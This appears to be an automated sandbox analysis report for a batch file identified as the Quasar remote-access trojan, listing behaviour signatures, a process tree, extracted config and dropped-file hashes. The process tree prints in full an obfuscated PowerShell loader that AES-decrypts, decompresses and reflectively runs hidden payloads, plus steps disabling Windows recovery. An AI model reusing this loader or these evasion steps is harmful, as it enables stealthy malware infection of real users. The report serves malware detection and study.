Overview

overview

10

Static

static

1

hand.bat

windows10-2004-x64

8

hand.bat

windows10-ltsc 2021-x64

10

hand.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    19-11-2024 21:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    hand.bat

  • Size

    7.0MB

  • MD5

    1a013c7ac90b58073895b26cae70def7

  • SHA1

    60c9c3294fc7ac3d336a478274f62f4818498230

  • SHA256

    698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688

  • SHA512

    c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75

  • SSDEEP

    49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y

Score
10/10
quasardefense_evasionexecutionpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    1162A0E173FED8E7CF598896A547E279E681EE6F

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1076
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d5b9cfd4-9e48-4179-a51b-288ac74b712a}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1364
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{1920acd9-7efd-4a75-ba67-774de67381d9}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3720
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:680
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:976
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
        1⤵
          PID:476
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
          1⤵
          • Indicator Removal: Clear Windows Event Logs
          PID:764
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
          1⤵
            PID:716
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
            1⤵
              PID:632
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
              1⤵
                PID:1108
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1116
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                  1⤵
                    PID:1200
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1272
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:3280
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1356
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                        1⤵
                          PID:1444
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                          1⤵
                            PID:1460
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                            1⤵
                              PID:1480
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1536
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2136
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                  1⤵
                                    PID:1676
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1688
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                      1⤵
                                        PID:1704
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1844
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:2000
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:2012
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                              1⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1744
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1064
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1932
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:2056
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2144
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2220
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2364
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2524
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2604
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2612
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                              1⤵
                                                              • Drops file in System32 directory
                                                              • Modifies data under HKEY_USERS
                                                              PID:2764
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                              1⤵
                                                                PID:2800
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2824
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                  1⤵
                                                                    PID:2860
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2868
                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                      1⤵
                                                                        PID:2108
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:3076
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:3248
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3564
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:3652
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4788
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:4420
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
                                                                                    3⤵
                                                                                      PID:1968
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell.exe -WindowStyle Hidden
                                                                                      3⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Drops file in Windows directory
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2044
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\hand.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                        4⤵
                                                                                        • Drops file in Windows directory
                                                                                        PID:3208
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                        4⤵
                                                                                          PID:1508
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:1252
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
                                                                                              5⤵
                                                                                                PID:1420
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -WindowStyle Hidden
                                                                                                5⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Drops file in Windows directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3168
                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                  "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                                                  6⤵
                                                                                                    PID:2156
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    "cmd" /K CHCP 437
                                                                                                    6⤵
                                                                                                      PID:960
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        7⤵
                                                                                                          PID:2380
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          CHCP 437
                                                                                                          7⤵
                                                                                                            PID:1556
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell REAgentC.exe /disable
                                                                                                            7⤵
                                                                                                              PID:652
                                                                                                              • C:\Windows\system32\ReAgentc.exe
                                                                                                                "C:\Windows\system32\ReAgentc.exe" /disable
                                                                                                                8⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Windows directory
                                                                                                                PID:380
                                                                                                  • C:\Windows\$nya-onimai2\oauLVi.exe
                                                                                                    "C:\Windows\$nya-onimai2\oauLVi.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1780
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      3⤵
                                                                                                        PID:4572
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3768
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:780
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4120
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:4356
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4700
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:4696
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:560
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:1660
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2848
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:4752
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                  1⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:5080
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:4324
                                                                                                                  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                    1⤵
                                                                                                                      PID:4180
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                      1⤵
                                                                                                                        PID:1512
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4552
                                                                                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                          C:\Windows\System32\WaaSMedicAgent.exe 4f8877d37f7047dfe77f21b978646b31 okMwdK+ar0yplkfBH38DEA.0.1.0.0.0
                                                                                                                          1⤵
                                                                                                                          • Sets service image path in registry
                                                                                                                          PID:2288
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            2⤵
                                                                                                                              PID:2140
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                            1⤵
                                                                                                                              PID:1216
                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:3812
                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              1⤵
                                                                                                                                PID:4504
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                1⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2024
                                                                                                                              • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:2628
                                                                                                                              • C:\Windows\System32\smartscreen.exe
                                                                                                                                C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:2656
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:2160

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                    Filesize

                                                                                                                                    290B

                                                                                                                                    MD5

                                                                                                                                    bdec669a651b2255e6a3e7a502adf87b

                                                                                                                                    SHA1

                                                                                                                                    69d02d15e91fd182cfa25b8f092bbacaf0aff51b

                                                                                                                                    SHA256

                                                                                                                                    9bfda5443a616dfb72a593bfae4db9ce86dcdd6c2be45312baa703dd3d66f826

                                                                                                                                    SHA512

                                                                                                                                    8621d0255d41267d6d7f2aa5c63fc1cd283f7fb156a6603e32e2052829625b8e6b80b7905e2540551ac6b01e83b1fa37389119048dce9221fa21e561f260581d

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
                                                                                                                                    Filesize

                                                                                                                                    420B

                                                                                                                                    MD5

                                                                                                                                    6906b7f45d3678f75e56272114ec8cb9

                                                                                                                                    SHA1

                                                                                                                                    ef50530280eadd55618f1fd789cca80b1d6c7125

                                                                                                                                    SHA256

                                                                                                                                    c748967763a4192d790f99d1f1c7c6dc2af1d47f8a6f72ced961a25d852b1222

                                                                                                                                    SHA512

                                                                                                                                    6e9bcacc2736e9d4788dbbd7354522a8a0a1e7a0783d8eb279ce7a2abd63d262ffff4e8af4f988ca5fd7f25e317e58c0ca75319a131cdcf304be99841511ce38

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                    Filesize

                                                                                                                                    3KB

                                                                                                                                    MD5

                                                                                                                                    01ec6c015ace9f2ac560371d37d38b41

                                                                                                                                    SHA1

                                                                                                                                    a528a34406238a0e71baea5e79bd8fda497cf05e

                                                                                                                                    SHA256

                                                                                                                                    11f26190de4b040b04b6685d2a2db4c7b55c73c5580ac6a01ce1688380e7093d

                                                                                                                                    SHA512

                                                                                                                                    1c387fb4241e009f8423bb69eb03e97c987f80b0ef6ff9b7e32925421fdec4f72eea13eaa925657e139824a02ea45d908c38f01ef94cda7688530eae33895b94

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                    Filesize

                                                                                                                                    2KB

                                                                                                                                    MD5

                                                                                                                                    0245ee64bc0ee73ecf5d430fe18905f6

                                                                                                                                    SHA1

                                                                                                                                    5644835df13cd159521b0a0cfd12dbdf5c9732a4

                                                                                                                                    SHA256

                                                                                                                                    06f3ff1e4ef9fcfc2cdc5ffe2357fe5562bbae29bc552b20efbf20bf0a0079f8

                                                                                                                                    SHA512

                                                                                                                                    50760f9334cc06d3792e3c947277d10895c94d3b84f200222d54abc516fda97127a8e35d5266609f6d57af8d765950b31f8438aa21a22144c171d27c5fe9cf29

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttaneeq2.oqq.ps1
                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    Download Submit

                                                                                                                                  • C:\Windows\$nya-onimai2\oauLVi.exe
                                                                                                                                    Filesize

                                                                                                                                    36KB

                                                                                                                                    MD5

                                                                                                                                    b943a57bdf1bbd9c33ab0d33ff885983

                                                                                                                                    SHA1

                                                                                                                                    1cee65eea1ab27eae9108c081e18a50678bd5cdc

